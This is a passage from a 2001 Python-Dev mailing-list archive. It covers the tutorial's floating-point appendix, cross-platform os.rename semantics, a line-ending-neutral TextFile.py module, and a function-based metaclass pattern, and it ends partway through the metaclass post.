tutorial In-Reply-To: Michel Pelletier's message of "Tue, 22 May 2001 14:44:09 -0700 (PDT)" References: Message-ID: Michel Pelletier writes: > Who was it that said every equation will halve your audience? It was Stephen Hawking's editor when he was preparing A Brief History Of Time (or at least, it gets mentioned in the preface; the advice may be older). Cheers, M. -- 7. It is easier to write an incorrect program than understand a correct one. -- Alan Perlis, http://www.cs.yale.edu/homes/perlis-alan/quotes.html From jeremy@digicool.com Tue May 22 23:57:40 2001 From: jeremy@digicool.com (Jeremy Hylton) Date: Tue, 22 May 2001 18:57:40 -0400 (EDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: References: Message-ID: <15114.61156.692322.674137@slothrop.digicool.com> >>>>> "MWH" == Michael Hudson writes: MWH> Michel Pelletier writes: >> Who was it that said every equation will halve your audience? MWH> It was Stephen Hawking's editor when he was preparing A Brief MWH> History Of Time (or at least, it gets mentioned in the preface; MWH> the advice may be older). There's a similar saw about excerpts of books in foreign languages. I believe I first read it in reference to Umberto Eco's Foucault's Pendulum, which starts with a full page of Hebrew. Jeremy From chrishbarker@home.net Wed May 23 00:21:01 2001 From: chrishbarker@home.net (Chris Barker) Date: Tue, 22 May 2001 16:21:01 -0700 Subject: [Pythonmac-SIG] Re: [Python-Dev] Import hook to do end-of-line conversion? References: <20010414192445-r01010600-f8273ce6@213.84.27.177> Message-ID: <3B0AF45D.732126E6@home.net> This is a multi-part message in MIME format. --------------B9643430766B782E71A5BE98 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Just van Rossum wrote: > Agreed. I'll try to write one, once I'm feeling better: having the flu doesn't > seem to help focussing on actual content... > > Just Just (or anyone else) Have you made any progress on this PEP? 
I'd like to see it happen, so if you haven't done it, I'll try to find the time to make a start on it myself. I have written a simple class that implements a line-ending-neutral text file class. I wrote it because I have a need for it, and I thought it would be a reasonable prototype for any syntax and methods we might want to use in an actual implementation. I doubt anyone would find the methods I used particularly clean or elegant (or fast) but it's the first thing I've come up with, and it seems to work. I've enclosed the module with this email. If that doesn't work, let me know and I'll put it on a website. -Chris -- Christopher Barker, Ph.D. ChrisHBarker@home.net --- --- --- http://members.home.net/barkerlohmann ---@@ -----@@ -----@@ ------@@@ ------@@@ ------@@@ Oil Spill Modeling ------ @ ------ @ ------ @ Water Resources Engineering ------- --------- -------- Coastal and Fluvial Hydrodynamics -------------------------------------- ------------------------------------------------------------------------ --------------B9643430766B782E71A5BE98 Content-Type: text/plain; charset=us-ascii; name="TextFile.py" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="TextFile.py"
#!/usr/bin/env python

"""
TextFile.py : a module that provides a UniversalTextFile class, and a
replacement for the native python "open" command that provides an
interface to that class.

It would usually be used as:

from TextFile import open

then you can use the new open just like the old one (with some added
flags and arguments)

or

import TextFile
file = TextFile.open(filename,flags,[bufsize], [LineEndingType], [LineBufferSize])
"""

import os

## Re-map the open function
_OrigOpen = open

def open(filename,flags = "r",bufsize = -1, LineEndingType = "native", LineBufferSize = ""):
    """
    A new open function, that returns a regular python file object for
    the old calls, and returns a new nifty universal text file when
    required.

    This works just like the regular open command, except that a new
    flag and a new parameter has been added.

    Call:

    file = open(filename,flags = "r",bufsize = -1, LineEndingType = "native"):

    - filename is the name of the file to be opened
    - flags is a string of one letter flags, the same as the standard
      open command, plus a "t" for universal text file.
    - - "b" means binary file, this returns the standard binary file object
    - - "t" means universal text file
    - - "r" for read only
    - - "w" for write. If there is both "w" and "t" then the user can
        specify a line ending type to be used with the LineEndingType
        parameter.
    - - "a" means append to existing file
    - bufsize specifies the buffer size to be used by the system. Same
      as the regular open function
    - LineEndingType is used only for writing (and appending) files, to
      specify a non-native line ending to be written.
    - - The options are: "native", "DOS", "Posix", "Unix", "Mac", or the
        characters themselves( "\r\n", etc. ). "native" will result in
        using the standard file object, which uses whatever is native
        for the system that python is running on.
    - LineBufferSize is the size of the buffer used to read data in a
      readline() operation. The default is currently set to 200
      characters. If you will be reading files with many lines over 200
      characters long, you should set this number to the largest
      expected line length.
    """
    if "t" in flags: # this is a universal text file
        if ("w" in flags or "a" in flags) and LineEndingType == "native":
            return _OrigOpen(filename,flags.replace("t",""), bufsize)
        return UniversalTextFile(filename,flags,LineEndingType,LineBufferSize)
    else: # this is a regular old file
        return _OrigOpen(filename,flags,bufsize)


class UniversalTextFile:
    """
    A class that acts just like a python file object, but has a mode
    that allows the reading of arbitrary formatted text files, i.e. with
    either Unix, DOS or Mac line endings. [\n , \r\n, or \r]

    To keep it truly universal, it checks for each of these line ending
    possibilities at every line, so it should work on a file with mixed
    endings as well.
    """
    def __init__(self,filename,flags = "r",LineEndingType = "native",LineBufferSize = ""):
        self._file = _OrigOpen(filename,flags.replace("t","")+"b")
        LineEndingType = LineEndingType.lower()
        if LineEndingType == "native":
            self.LineSep = os.linesep  # os.linesep is a string, not a function
        elif LineEndingType == "dos":
            self.LineSep = "\r\n"
        elif LineEndingType == "posix" or LineEndingType == "unix":
            self.LineSep = "\n"
        elif LineEndingType == "mac":
            self.LineSep = "\r"
        else:
            self.LineSep = LineEndingType

        ## some attributes
        self.closed = 0
        self.mode = flags
        self.softspace = 0
        if LineBufferSize:
            self._BufferSize = LineBufferSize
        else:
            self._BufferSize = 200

    def readline(self):
        start_pos = self._file.tell()
        ##print "Current file position is:", start_pos
        line = ""
        TotalBytes = 0
        Buffer = self._file.read(self._BufferSize)
        while Buffer:
            ##print "Buffer = ",repr(Buffer)
            newline_pos = Buffer.find("\n")
            return_pos = Buffer.find("\r")
            if return_pos == newline_pos-1 and return_pos >= 0: # we have a DOS line
                line = Buffer[:return_pos]+ "\n"
                TotalBytes = newline_pos+1
                break
            elif ((return_pos < newline_pos) or newline_pos < 0 ) and return_pos >=0: # we have a Mac line
                line = Buffer[:return_pos]+ "\n"
                TotalBytes = return_pos+1
                break
            elif newline_pos >= 0: # we have a Posix line
                line = Buffer[:newline_pos]+ "\n"
                TotalBytes = newline_pos+1
                break
            else: # we need a larger buffer
                NewBuffer = self._file.read(self._BufferSize)
                if NewBuffer:
                    Buffer = Buffer + NewBuffer
                else: # we are at the end of the file, without a line ending.
                    self._file.seek(start_pos + len(Buffer))
                    return Buffer

        self._file.seek(start_pos + TotalBytes)
        return line

    def readlines(self,sizehint = None):
        """
        readlines acts like the regular readlines, except that it
        understands any of the standard text file line endings ("\r\n",
        "\n", "\r").

        If sizehint is used, it will read a maximum of that many bytes.
        It will not round up, as the regular readlines does. This means
        that if your buffer size is less than the length of the next
        line, you won't get anything.
        """
        if sizehint:
            Data = self._file.read(sizehint)
        else:
            Data = self._file.read()

        if len(Data) == sizehint:
            #print "The buffer is full"
            FullBuffer = 1
        else:
            FullBuffer = 0
        Data = Data.replace("\r\n","\n").replace("\r","\n")
        Lines = [line + "\n" for line in Data.split('\n')]
        #print Lines

        ## If the last line is only a linefeed it is an extra line
        if Lines[-1] == "\n":
            del Lines[-1]
        ## if it isn't then the last line didn't have a linefeed, so we need to remove the one we put on.
        else:
            ## or it's the end of the buffer
            if FullBuffer:
                #print "the file is at:",self._file.tell()
                #print "the last line has length:",len(Lines[-1])
                self._file.seek(-(len(Lines[-1])-1),1) # reset the file position
                del(Lines[-1])
            else:
                Lines[-1] = Lines[-1][:-1]
        return Lines

    def readnumlines(self,NumLines = 1):
        """
        readnumlines is an extension to the standard file object. It
        returns a list containing the number of lines that are
        requested. I have found this to be very useful, and it allows me
        to avoid the many loops like:

        lines = []
        for i in range(N):
            lines.append(file.readline())

        Also, if I ever get around to writing this in C, it will provide
        a speed improvement.
        """
        Lines = []
        while len(Lines) < NumLines:
            Lines.append(self.readline())
        return Lines

    def read(self,size = None):
        """
        read acts like the regular read, except that it translates any
        of the standard text file line endings ("\r\n", "\n", "\r") into
        a "\n"

        If size is used, it will read a maximum of that many bytes,
        before translation. This means that if the line endings have
        more than one character, the size returned will be smaller. This
        could be patched, but it didn't seem worth it. If you want that
        much control, use a binary file.
        """
        if size:
            Data = self._file.read(size)
        else:
            Data = self._file.read()

        return Data.replace("\r\n","\n").replace("\r","\n")

    def write(self,string):
        """
        write is just like the regular one, except that it uses the line
        separator specified when the file was opened for writing or
        appending.
        """
        self._file.write(string.replace("\n",self.LineSep))

    def writelines(self,list):
        for line in list:
            self.write(line)

    # The rest of the standard file methods mapped
    def close(self):
        self._file.close()
        self.closed = 1

    def flush(self):
        self._file.flush()

    def fileno(self):
        return self._file.fileno()

    def seek(self,offset,whence = 0):
        self._file.seek(offset,whence)

    def tell(self):
        return self._file.tell()

--------------B9643430766B782E71A5BE98--
From guido@digicool.com Wed May 23 00:46:53 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 19:46:53 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: Your message of "Tue, 22 May 2001 16:54:42 CDT." <15114.57378.887742.531145@beluga.mojam.com> References: <15114.57378.887742.531145@beluga.mojam.com> Message-ID: <200105222346.f4MNkr104833@odiug.digicool.com> > It was brought to my attention a week ago by a client that os.rename > semantics differ between Unix and Windows. On Unix, if the destination file > already exists it is silently deleted. On Windows, an exception is raised. > I was able to verify this for Python 2.0 on Windows98. I assume nothing > changed for 2.1, but I can't verify that. I've always known this, and assumed it was common knowledge. Sorry. ;-) > (Windows trashed my partition > table and my Linux root partition while I was downloading 2.1. > Consequently, I no longer run Windows. Take that, Bill...) I haven't > checked the Mac yet (will do that when I get back to the US), but I think > that os.rename should have the same semantics across all platforms.
To the > extent reasonably possible, I think this should also be true of other common > functions exposed through the os module. > > On the (unsupportable) theory that to-date, more Python apps have been > written and/or deployed on Unix-like systems and that where Windows apps are > concerned, many developers will have added a thin wrapper to mimic the Unix > semantics, I think less breakage would result if the Unix semantics were > implemented in the Windows version. It appears that is what POSIX > compliance would demand as well. > > Skip I certainly wouldn't want to try to emulate the Windows semantics on Unix. However, I think that emulating the correct Posix semantics on Windows is not possible either. The Posix rename() call guarantees that it is atomic: there is no point in time where the file doesn't exist at all (and a system or program crash can't delete the file). I wouldn't know how to do that in Windows -- the straightforward version if os.path.exists(target): os.unlink(target) os.rename(source, target) leaves a vulnerability open where the target doesn't exist and if at that point the system crashes or the program is killed, you lose the target. I would prefer to document the difference so applications can decide how to deal with this. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Wed May 23 00:50:29 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 19:50:29 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Tue, 22 May 2001 14:44:09 PDT." References: Message-ID: <200105222350.f4MNoUj04853@odiug.digicool.com> > Who was it that said every equation will halve your audience? Einstein. > I agree with that, the tutorial should try to be as broad and simple > as possible. But keep in mind that the particular Python tutorial we're talking about is intended for an audience of folks who already know how to program. I vote against dumbing this down. 
--Guido van Rossum (home page: http://www.python.org/~guido/) From michel@digicool.com Wed May 23 01:17:59 2001 From: michel@digicool.com (Michel Pelletier) Date: Tue, 22 May 2001 17:17:59 -0700 (PDT) Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <200105222350.f4MNoUj04853@odiug.digicool.com> Message-ID: On Tue, 22 May 2001, Guido van Rossum wrote: > > I agree with that, the tutorial should try to be as broad and simple > > as possible. > > But keep in mind that the particular Python tutorial we're talking > about is intended for an audience of folks who already know how to > program. I vote against dumbing this down. Now that I've actually read the tutorial (wink) I see the true target audience. For some reason, I thought it was oriented more toward the CP4E audience. Is there a python "children's book" complete with big red dogs and rabbits in waistcoats? That would be an interesting project... -Michel From guido@digicool.com Wed May 23 01:20:25 2001 From: guido@digicool.com (Guido van Rossum) Date: Tue, 22 May 2001 20:20:25 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Tue, 22 May 2001 17:17:59 PDT." References: Message-ID: <200105230020.f4N0KPU05103@odiug.digicool.com> > Is there a python "children's book" complete with big red dogs and rabbits > in waistcoats? That would be an interesting project... See http://www.python.org/sigs/edu-sig/ and http://www.python.org/doc/Intros.html (the latter has a section with intros for non-programmers). --Guido van Rossum (home page: http://www.python.org/~guido/) From tim.one@home.com Wed May 23 01:23:42 2001 From: tim.one@home.com (Tim Peters) Date: Tue, 22 May 2001 20:23:42 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: I struggled with a way to do a better job of explaining this stuff last night. As I see others already said, the Tutorial is not aimed at script kiddies, or non-programmers, or even programming newbies, but at programmers who are simply new to Python. 
So everything I put in the tutorial was either jarringly out of place, or inadequate to address the audience you (Michel) have in mind. But I agree that's an important audience, and I spend a fair chunk of my life now anyway explaining this stuff over & over to those who think computing a ratio of two integers is akin to solving fourth order differential equations. In the end I decided to write a Tutorial Appendix in a much gentler style. It doesn't really fit with the rest of the Tutorial, but then that's *why* it's an Appendix. The patch is here: http://sourceforge.net/tracker/index.php?func=detail&aid=426208&group_id=5470&atid=305470 I also changed the tutorial fp examples so they have an excellent chance of displaying the same strings across all platforms, and even if Python 10K defaults to decimal floating-point someday (perhaps in the year 10000, as its name suggests). From gward@python.net Wed May 23 01:33:11 2001 From: gward@python.net (Greg Ward) Date: Tue, 22 May 2001 20:33:11 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com>; from guido@digicool.com on Tue, May 22, 2001 at 07:46:53PM -0400 References: <15114.57378.887742.531145@beluga.mojam.com> <200105222346.f4MNkr104833@odiug.digicool.com> Message-ID: <20010522203311.E1245@gerg.ca> On 22 May 2001, Guido van Rossum said: > I would prefer to document the difference so applications can decide > how to deal with this. I agree -- it has always seemed to me that the standard library merely exposes the underlying OS functionality for you. This puts portability somewhat in the hands of the application writer -- with power comes responsibility. I think that's the way it should be; any attempt to convert OS A to the semantics of OS B will fall down somewhere. Witness the loss-of-atomicity in Guido's example. I'm sure any other semantic difference between OSes would have similar "gotchas" if we attempted to paper over them.
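Greg's point is that the os module exposes each platform's own semantics and leaves the policy to the application. The following is a hedged illustration of one such application-level policy, for POSIX systems only, written as a sketch in modern Python 3. rename_posix is a hypothetical helper, not part of the os module. Its no-overwrite branch uses a different technique from the check-then-rename approach discussed in this thread. It hard-links first (link(2) fails if the target already exists) and only then unlinks the source. This assumes both paths live on the same filesystem and that the filesystem supports hard links.

```python
import os
import tempfile


def rename_posix(src, dst, replace=True):
    """Rename src to dst on a POSIX system (hypothetical helper).

    replace=True: plain os.rename(); POSIX rename() atomically replaces an
    existing dst, so dst never goes missing, even briefly.
    replace=False: refuse to overwrite dst without a check-then-rename race.
    os.link() raises FileExistsError if dst already exists; only after the
    link succeeds is the old name removed.
    """
    if replace:
        os.rename(src, dst)
    else:
        os.link(src, dst)   # atomic: fails if dst exists
        os.unlink(src)      # drop the old name


with tempfile.TemporaryDirectory() as tmp:
    a = os.path.join(tmp, "a")
    b = os.path.join(tmp, "b")
    for path, text in ((a, "new"), (b, "old")):
        with open(path, "w") as f:
            f.write(text)

    try:
        rename_posix(a, b, replace=False)
    except FileExistsError:
        print("refused: b already exists")

    rename_posix(a, b)          # silently replaces b, the Unix behaviour
    with open(b) as f:
        print(f.read())         # new
    print(os.path.exists(a))    # False
```

If the process crashes between the link and the unlink, the file stays reachable under both names rather than being lost. The replace=True branch simply relies on POSIX rename() being atomic.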
Greg -- Greg Ward - just another Python hacker gward@python.net http://starship.python.net/~gward/ Beware of altruism. It is based on self-deception, the root of all evil. From tim.one@home.com Wed May 23 07:31:29 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 23 May 2001 02:31:29 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: <20010522094157.A1245@gerg.ca> Message-ID: [Greg Ward, on http://www.lahey.com/float.htm] > I found this article more useful, interesting, and informative than > whatever I learned about binary floating-point in my academic years. > Good link, Tim. Two catches: > > * I can just barely follow the FORTRAN examples; I very much doubt > the average Python newbie would have any more luck than me The goal is to frighten them: the ones with the right stuff to use fp without destroying a satellite, bringing down the Internet, designing a pacemaker that fails when rounding a corner clockwise at 1.37g, causing a small country's economy to collapse, making jet fighters spontaneously turn upside down when crossing the equator, or triggering WW III by accident, will persist. BTW, not all of those were made up! > * I tried several of the FORTRAN examples in Python, and did not > witness any of the gotchas they are meant to illustrate. Possibly > it's just single-precision vs. double-precision difference, but > Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2 > doesn't demonstrate the same gotchas as that article does. You can't illustrate the last half of their examples in Python without playing obscure games with the struct module, because they rely on the existence of more than one size of floating-point type. Your lack of luck with the first half of their examples is indeed solely due to that he used single-precision examples and Python's float is double. You need to find different numbers to show the same things in Python; like so:

# Binary Floating Point
x = 100000000000. * 0.00000000001
if x != 1.0:
    print "Oops! It's %r" % x

# Inexactness
a = 98. / 49.
reciprocal = 1./49.
b = 98. * reciprocal
if a != b:
    print "Oops! They're %r and %r" % (a, b)

# Crazy Conversions
x = 32.05
y = x * 100.    # "looks like" 3205. if display rounded
i = int(y)      # actually truncates to 3204
print y, i, repr(y)

It's Real Work coming up with stuff like that. What I'm hearing is that people won't understand it anyway -- so screw it. If they want an education, they can prove it by doing a google search <0.6 wink>. From tim.one@home.com Wed May 23 07:44:14 2001 From: tim.one@home.com (Tim Peters) Date: Wed, 23 May 2001 02:44:14 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <200105222346.f4MNkr104833@odiug.digicool.com> Message-ID: [Guido] > ... > I certainly wouldn't want to try to emulate the Windows semantics on > Unix. However, I think that emulating the correct Posix semantics on > Windows is not possible either. Neither is it desirable: Windows isn't POSIX, and Windows users would be appalled if os.rename() could silently destroy files. If such a function needs to exist, create a new cowboy_unix_tricks module instead. This has never been a problem for me because I always check to see whether the target file exists before using os.rename(), and do something else if it does. I understand that's vulnerable to races, but nobody asked whether I cared about that. > The Posix rename() call guarantees that it is atomic: there is no > point in time where the file doesn't exist at all (and a system or > program crash can't delete the file). I wouldn't know how to do > that in Windows -- the straightforward version >
> if os.path.exists(target):
>     os.unlink(target)
> os.rename(source, target)
>
> leaves a vulnerability open where the target doesn't exist and if at > that point the system crashes or the program is killed, you lose the > target. More obvious, it also fails if target simply exists and is open (you can't unlink an open file on Windows).
Nevertheless, you can do this renaming safely on Windows, via doing the right system magic to make rename happen at reboot time before Windows actually starts. But I'm not sure Skip's client would want to reboot each time Python did a file rename . > I would prefer to document the difference so applications can decide > how to deal with this. Yup! From MarkH@ActiveState.com Wed May 23 09:55:17 2001 From: MarkH@ActiveState.com (Mark Hammond) Date: Wed, 23 May 2001 18:55:17 +1000 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Message-ID: [Tim on a subject near and dear to his testicles] > It's Real Work coming up with stuff like that. What I'm hearing is that > people won't understand it anyway -- so screw it. If they want > an education, > they can prove it by doing a google search <0.6 wink>. I am inclined to agree. IMO, The Python tutorial or other documentation should include a basic example of these "errors", and a link to _either_ of the HTML pages referenced in this thread as an optional extra. Just enough to stop _most_ of the "this is a bug" posts - but stopping well short of any attempt to "educate" them in floating point madness. Just _one_ example of floats not being exact would suffice. Going from my personal experience, I learnt long ago that floating point is not exact. That is all I needed to know to move on. I didn't like it, and I didn't understand exactly why (I thought I did, but Tim put a stop to that misconception ), but I could move on once I had that skerrick of enlightenment. And believe it or not, some of my code _does_ use floats, and _does_ work! (well, works as well as the rest of my code anyway ) And-it-wasn't-even-Python-that-taught-me, Mark. From pf@artcom-gmbh.de Wed May 23 08:49:13 2001 From: pf@artcom-gmbh.de (Peter Funk) Date: Wed, 23 May 2001 09:49:13 +0200 (MEST) Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> from "Fred L. Drake, Jr." 
at "May 22, 2001 06:04:11 pm" Message-ID: Hi, Fred L. Drake, Jr. wrote: > skip@pobox.com writes: > > On the (unsupportable) theory that to-date, more Python apps have been > > written and/or deployed on Unix-like systems and that where Windows apps are > > concerned, many developers will have added a thin wrapper to mimic the Unix > > semantics, I think less breakage would result if the Unix semantics were > > I don't know whether there are more deployed Python apps on Unix > than on Windows (and I've no good idea about how to find out), but I > think unifying the semantics one way or the other is a good thing. > Regardless of which set of semantics is chosen. I agree. May I suggest adding an optional third boolean parameter to os.rename called 'replace', which defaults either to TRUE or FALSE, so modifying existing apps will become even less hassle to potential porters. Here is a strawman to explain what I mean:
--------------------------------------
import os

def new_rename(src, dst, replace=0, old_rename=os.rename):
    if os.path.exists(dst):
        if replace:
            if not os.path.isdir(dst):
                os.remove(dst)
            else:
                # I'm not sure what to do here. recursive removal? dangerous!
                raise NotImplementedError
        else:
            raise OSError("%s already exists" % dst)
    return old_rename(src, dst)

os.rename = new_rename
--------------------------------------
Regards, Peter -- Peter Funk, Oldenburger Str.86, D-27777 Ganderkesee, Germany, Fax:+49 4222950260 office: +49 421 20419-0 (ArtCom GmbH, Grazer Str.8, D-28359 Bremen, Germany) From jack@oratrix.nl Wed May 23 12:15:10 2001 From: jack@oratrix.nl (Jack Jansen) Date: Wed, 23 May 2001 13:15:10 +0200 Subject: [Python-Dev] Assertion failed in dictobject.c Message-ID: <20010523111510.D504D3B8999@snelboot.oratrix.nl> I'm seeing the assert on line 525 in dictobject.c (revision 2.92) failing. The debugger tells me that ma_fill and ma_size are both 8. ma_used is 2, and interestingly hash is also 8.
Going back to revision 2.90 fixes the problem (or masks it). -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From skip@pobox.com (Skip Montanaro) Wed May 23 12:59:45 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Wed, 23 May 2001 06:59:45 -0500 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: References: <200105222346.f4MNkr104833@odiug.digicool.com> Message-ID: <15115.42545.172775.716565@beluga.mojam.com> >>>>> "Tim" == Tim Peters writes: Tim> [Guido] >> I would prefer to document the difference so applications can decide >> how to deal with this. Tim> Yup! Submitted as patch #426598, assigned to Dr. Doc (aka Fred). Skip From skip@pobox.com (Skip Montanaro) Wed May 23 13:11:51 2001 From: skip@pobox.com (Skip Montanaro) (skip@pobox.com (Skip Montanaro)) Date: Wed, 23 May 2001 07:11:51 -0500 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: References: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com> Message-ID: <15115.43271.480135.227059@beluga.mojam.com> Peter> I agree. May I suggest to add an optional third boolean Peter> parameter to os.rename called 'replace', which defaults either to Peter> TRUE or FALSE, so modifying existing apps will become even less Peter> hassle to potential porters. In his response to my post, Guido indicated there is a race condition. Between the time you delete the preexisting destination file and do the actual file rename, Windows could wink out on you, leaving you with the original src file and no original dst file. POSIX semantics require the rename to be atomic. This is just not going to be possible. 
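To make the race Skip describes concrete, here is a minimal sketch of the unlink-then-rename workaround. It assumes Python 3, where os.rename raises FileExistsError on Windows if the destination already exists. The helper name rename_replacing is hypothetical. The comment marks the window in which the operation is not atomic.

```python
import os


def rename_replacing(src, dst):
    """Hypothetical helper: rename src to dst, overwriting an existing dst.

    On POSIX, os.rename already replaces dst atomically, so the fallback
    below only runs where rename refuses to overwrite (assumed: Windows,
    which raises FileExistsError in that case).
    """
    try:
        os.rename(src, dst)
    except FileExistsError:
        # RACE WINDOW: once dst is removed and before the rename completes,
        # a crash leaves the original dst gone and the new file still at src.
        os.remove(dst)
        os.rename(src, dst)
```

Catching only FileExistsError matters here. A broader `except OSError` would also delete dst when src is simply missing. Python 3.3 and later provide os.replace(), which overwrites an existing destination file on both POSIX and Windows without the explicit remove.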
Fred, perhaps my doc mod should be enhanced to identify the race condition for people who need to use os.rename on Windows and will be forced to first unlink the destination file. Skip From guido@digicool.com Wed May 23 14:19:24 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 09:19:24 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Wed, 23 May 2001 02:31:29 EDT." References: Message-ID: <200105231319.f4NDJOs06485@odiug.digicool.com> I liked the text that Tim posted to SF, but I would like it even better if it also *contained* the text from the "PresentationError" moinmoin wiki page, rather than referring to it by URL. The moinmoin URL is not a good long-term name for that information -- printed copies of the tutorial will persist long after the moinmoin wiki has been moved or consolidated. Plus, instead of referring people to the moinmoin wiki page, I'd like to be able to refer them to the appendix of the tutorial! --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Wed May 23 14:32:17 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 09:32:17 -0400 Subject: [Python-Dev] FP vs. tutorial In-Reply-To: Your message of "Wed, 23 May 2001 18:55:17 +1000." References: Message-ID: <200105231332.f4NDWH706564@odiug.digicool.com> [Mark] > IMO, The Python tutorial or other documentation should include a basic > example of these "errors", and a link to _either_ of the HTML pages > referenced in this thread as an optional extra. > > Just enough to stop _most_ of the "this is a bug" posts - but > stopping well short of any attempt to "educate" them in floating > point madness. Just _one_ example of floats not being exact would > suffice. I agree: we don't have to explain *why* it happens. We just have to explain *that* it happens, so folks don't think they've discovered a bug in Python.
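Here is the kind of single example Mark and Guido have in mind, as a minimal sketch. It assumes Python 3, and the digits shown come from Python 3's repr. math.isclose is a later addition (Python 3.5), included only to show the usual remedy of comparing within a tolerance.

```python
import math

# 0.1, 0.2 and 0.3 have no exact binary (base 2) representation, so each
# literal is stored as the nearest double and the rounding errors can show.
total = 0.1 + 0.2
print(repr(total))               # 0.30000000000000004
print(total == 0.3)              # False: exact comparison fails
print(math.isclose(total, 0.3))  # True: compare within a tolerance instead
```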
Or maybe we could do this: in the main text, explain and show *that* it happens, and refer to the appendix which can explain *why* it happens to those interested, in a gentle manner like what Tim already wrote. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido@digicool.com Wed May 23 14:52:02 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 23 May 2001 09:52:02 -0400 Subject: [Python-Dev] unifying os.rename semantics across platform In-Reply-To: Your message of "Wed, 23 May 2001 09:49:13 +0200." References: Message-ID: <200105231352.f4NDq3g06738@odiug.digicool.com> > May I suggest to add an optional third boolean parameter to > os.rename called 'replace', which defaults either to TRUE or FALSE, > so modifying existing apps will become even less hassle to potential > porters. I see no reason to change the API. In any case, for backwards compatibility, the default would have to be platform dependent, which strikes me as just as bad as the current situation. --Guido van Rossum (home page: http://www.python.org/~guido/) From thomas@xs4all.net Wed May 23 15:00:25 2001 From: thomas@xs4all.net (Thomas Wouters) Date: Wed, 23 May 2001 16:00:25 +0200 Subject: [Python-Dev] Python 2.1.1 Message-ID: <20010523160025.B690@xs4all.nl> As those of you on python-checkins might have noticed ;) I started checking in Python 2.1.1 bugfixes. I'd hoped to finish all of my backlog today, but unfortunately I'm now called away on a surprise emergency meeting, so I'm not sure if I'll make it. The 2.1.1 tree is in sort of an unstable state right now; I'll fix that today in any case, but after the meeting. (As for why I started doing it: I just spent about two weeks of digging through Pine source code, and its imap server in particular, and I decided I deserved a break -- Python reads like a Heinlein novel, after pine code: readable, straightforward, and just enough complexity to keep it entertaining :) -- Thomas Wouters Hi! I'm a .signature virus!
copy me into your .signature file to help me spread! From aahz@rahul.net Wed May 23 15:08:45 2001 From: aahz@rahul.net (Aahz Maruch) Date: Wed, 23 May 2001 07:08:45 -0700 (PDT) Subject: [Python-Dev] Killing threads Message-ID: <20010523140845.B092299C83@waltz.rahul.net> Okay, so we all know it isn't possible to kill threads cleanly and safely in any kind of cross-platform way. At the same time, a program that has a thread running haywire should be able to kill itself completely, so that a monitoring process can restart it. How hard would it be to do only that in a cross-platform way? I'm guessing that for Unix, we'd just send a hard signal (9 or 15). No clue what would need to happen for Windows and Mac. (This got brought up because I experimented with os._exit() as a possible solution, but that GPFs on Win98SE.) -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From thomas.heller@ion-tof.com Wed May 23 18:28:07 2001 From: thomas.heller@ion-tof.com (Thomas Heller) Date: Wed, 23 May 2001 19:28:07 +0200 Subject: [Python-Dev] New metaclass pattern (Was Re: Simulating Class (was Re: Does Python have Class methods)) References: Message-ID: <020301c0e3ad$bb559790$e000a8c0@thomasnotebook> [this message has also been posted to comp.lang.python] Guido's metaclass hook in Python goes this way: If a base class (let's better call it a 'base object') has a __class__ attribute, this is called to create the new class. From demo/metaclasses/index.html:

class C(B):
    a = 1
    b = 2

Assuming B has a __class__ attribute, this translates into:

C = B.__class__('C', (B,), {'a': 1, 'b': 2})

Usually B is an instance of a normal class. So the above code will create an instance of B, call B's __init__ method with 'C', (B,), and {'a': 1, 'b': 2}, and assign the instance of B to the variable C. I've ever since played with this metaclass hook, and always found the problem that B would have to completely simulate the normal python behaviour for classes (modifying of course what you want to change). The problem is that there are a lot of successful and unsuccessful attribute lookups, which require a lot of overhead when implemented in Python: So the result is very slow (too slow to be usable in some cases). ------ Python 2.1 allows to attach attributes to function objects, so a new metaclass pattern can be implemented. The idea is to let B be a function having a __class__ attribute (which does _not_ have to be a class, it can again be a function). What is the improvement? Classes, when called, create new instances of themselves, functions can return whatever they want. I've used this pattern to realize the ideas Costas Menico described in an article 'Simulating class' in c.l.p, and James Althoff improved in a followup. The proposal was to create class methods the following way:

<--- start of code --->
class Class1MetaClass:              # Base for metaclass
    # Define "class methods" for Class1
    def whoami(self):
        print 'Class1MetaClass.whoami:', self

    # define Class1 & its "instance methods"
    class Class1:                   # Base class
        def whoami(self):
            print 'Class1.whoami:', self

Class1Meta = Class1MetaClass()  # Make & name the singleton metaclass instance
